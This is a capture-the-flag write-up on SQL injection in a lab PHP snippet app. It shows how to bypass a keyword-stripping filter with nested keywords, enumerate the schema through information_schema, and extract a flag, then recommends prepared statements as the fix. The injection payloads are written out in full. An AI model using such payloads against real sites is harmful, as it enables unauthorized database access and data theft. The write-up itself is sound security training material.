Vulnerability analysis
The tadasnippets application maintains a database of code snippets. It lets the user view existing code snippets (with view.php?name=...) and add a new code snippet to the database (with index.php and some POST parameters). The SELECT query performed by the view.php page is vulnerable to SQL injection by the GET parameter "name". We can confirm the presence of the vulnerability by requesting:
view.php?name=doesntexist'+OR+1=1+--+
And checking that the site returns the first snippet of the database instead of nothing. The "name" parameter is ineffectively protected with a string-based blackbox filter that strips the "select" and "union" strings in a case-insensitive fashion.

Exploitation
We can bypass the filter by injecting camouflaged SQL keywords like "ununionion" and "selselectect". By analyzing the PHP code of view.php, we see that the query has a single column, and the schema name is "tadasnippets". First, we have to discover the structure of the database by injecting:
view.php?name=doesntexist'+ununionion+selselectect+table_name+from+information_schema.columns+where+table_schema%3d'tadasnippets'+limit+0,1+--+
We can cycle on "limit+0,1", "limit+1,1", etc. to discover all the table names of the tadasnippets scheme. Eventually, we find a suspect table named "hugesecret". We discover the name of its columns with:
view.php?name=doesntexist'+ununionion+selselectect+column_name+from+information_schema.columns+where+table_schema%3d'tadasnippets'+and+table_name%3d'hugesecret'+limit+0,1+--+
We discover the column named "flag". Finally, we steal the flag with:
view.php?name=doesntexist'+ununionion+selselectect+flag+from+hugesecret+--+
The flag is: SNH{drumroll...TA-DA!_the_flag!}

Remediation
The main remediation is replacing the insecure stripping filter in view.php with a more secure mysqli_real_escape_string() invocation on $name, or either use prepared statements.